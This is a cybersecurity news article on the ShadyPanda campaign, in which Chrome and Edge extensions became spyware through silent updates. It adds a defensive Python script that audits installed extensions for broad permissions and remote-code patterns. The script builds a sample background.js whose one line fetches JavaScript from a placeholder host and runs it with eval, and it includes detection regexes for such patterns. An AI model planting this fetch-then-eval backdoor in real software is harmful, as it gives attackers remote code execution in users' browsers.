A long-running malware operation that has evolved over several years has been turning Chrome and Edge browser extensions into spyware through updates that added malicious functionality. According to a report from Koi Security, the ShadyPanda campaign affects 4.3 million users who downloaded the now-compromised extensions.
The ShadyPanda campaign consists of 20 malicious extensions on the Chrome Web Store and 125 in Edge. The extensions were first submitted in 2018, and the first signs of malicious behavior didn't show up until five years later, when a set of them posing as wallpaper and productivity tools began to show signs that something was amiss.[1]
Note: Microsoft has reached out to Amber Bouman regarding this story and has issued the following update: "We have removed all the extensions identified as malicious on Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement."
According to Koi Security, the malware campaign rolled out slowly, in phases, through the auto-update mechanism that is designed to keep users safe: "Chrome and Edge's trusted update pipeline silently delivered malware to users. No phishing. No social engineering. Just trusted extensions with quiet version bumps that turn productivity tools into surveillance platforms."
Here's everything you need to know about this massive malicious extension campaign along with what steps you can take to secure your browser and your data right now.
The extensions began their malicious activity by injecting tracking codes into legitimate links, which let them earn revenue from users' purchases. The researchers also observed search hijacking, in which search queries were redirected. Search queries were logged, monetized, sold, manipulated and exfiltrated.
ShadyPanda can collect a range of personal information from users, including browsing history, search queries, keystrokes, cookies, local and session storage, fingerprint data, and mouse clicks with coordinates. Extensions that had built up a "good" reputation were modified over the years to include a backdoor update that permitted hourly remote code execution: downloading and executing arbitrary JavaScript with full browser access. This meant they could monitor every website a user visited and exfiltrate browsing URLs, fingerprinting information and persistent identifiers.
Most concerning, the extensions were able to stage adversary-in-the-middle (AitM) attacks, which means they could facilitate credential theft, session hijacking and code injection into any website. Additionally, any attempt to open the browser's developer tools causes the extension to switch to benign behavior.
While Google has since removed the extensions from the Web Store, Koi Security found the campaign still active on the Microsoft Edge Add-ons platform, with one extension listed as having 3 million installs.* There is no way to tell whether those numbers are inflated to create a sense of legitimacy, though.
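The behaviors described above (broad access to every site, sensitive permissions, and a background script that fetches and executes remote JavaScript) can be checked for locally. The following Python script is an added example, not code from the Koi Security report or from the extensions themselves: it audits an unpacked extension directory as Chrome and Edge store them (one folder per extension ID and version under the profile's Extensions folder) and reports those markers. The permission list, the regex heuristics and the sample extension it builds are constructed assumptions for illustration.

```python
import json
import os
import re
import tempfile

# Heuristics are constructed assumptions, not taken from the Koi Security report.
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "scripting", "cookies", "history", "tabs"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
REMOTE_EXEC_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval() of runtime data"),
    (re.compile(r"new\s+Function\s*\("), "new Function() code construction"),
    (re.compile(r"https?://[^\s'\"]+\.js\b"), "remote .js URL in source"),
]

def audit_extension(ext_dir):
    """Audit one unpacked extension version directory (e.g. .../Extensions/<id>/<version>)."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | perms  # MV2 listed host patterns in permissions
    findings = []
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: can read and modify every site")
    findings += [f"sensitive permission: {p}" for p in sorted(perms & RISKY_PERMISSIONS)]
    for root, _, files in os.walk(ext_dir):
        for name in sorted(f for f in files if f.endswith(".js")):
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            findings += [f"{name}: {label}" for pat, label in REMOTE_EXEC_PATTERNS if pat.search(src)]
    return {"name": manifest.get("name"), "version": manifest.get("version"), "findings": findings}

def build_sample_extension(base_dir):
    """Write a constructed sample (not real ShadyPanda code) shaped like a backdoored wallpaper tool."""
    ext = os.path.join(base_dir, "sample_ext_id", "2.1.0")
    os.makedirs(ext)
    manifest = {"name": "Sample Wallpaper Tool", "version": "2.1.0", "manifest_version": 3,
                "permissions": ["storage", "tabs", "cookies", "scripting"],
                "host_permissions": ["<all_urls>"]}
    with open(os.path.join(ext, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(ext, "background.js"), "w", encoding="utf-8") as fh:
        # The fetch-then-execute shape the article describes; the URL is a placeholder.
        fh.write("fetch('https://updates.example.invalid/payload.js')"
                 ".then(r => r.text()).then(code => eval(code));\n")
    return ext

def run_demo():
    with tempfile.TemporaryDirectory() as tmp:  # build the sample in a scratch dir and audit it
        return audit_extension(build_sample_extension(tmp))
```

Point `audit_extension` at a real version folder from your own profile to review what an installed extension can do; a version bump that newly adds broad host access or remote-fetch patterns is the signal the article warns about.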
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.msn.com/en-us/news/technology/over-4-million-users-hit-with-spyware-that-can-turn-your-browser-extensions-into-malware-how-to-stay-safe/ar-AA1RA9cQ/